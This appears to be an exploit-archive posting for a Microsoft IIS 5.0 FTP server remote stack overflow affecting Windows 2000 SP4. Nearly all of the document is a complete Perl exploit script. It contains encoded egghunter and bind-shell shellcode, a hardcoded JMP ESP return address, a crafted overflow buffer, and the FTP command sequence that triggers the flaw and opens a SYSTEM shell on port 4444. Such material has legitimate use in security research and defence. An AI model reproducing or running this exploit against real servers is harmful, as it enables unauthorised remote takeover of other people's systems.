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Microsoft IIS 5.0 FTP Stack Overflow

Microsoft IIS 5.0 FTP Stack Overflow
Posted Sep 1, 2009
Authored by Mati Aharoni

Microsoft IIS version 5.0 FTP server remote stack overflow exploit for Windows 2000 SP4. Binds a shell to port 4444.

tags | exploit, remote, overflow, shell
systems | windows
SHA-256 | ce40cb6da965a415dbfc5397a6839d38275511d3ed979f7ce1fdfec8d8278203

Microsoft IIS 5.0 FTP Stack Overflow

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#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt

use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";


print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms

$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";

# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
"HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;

print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope


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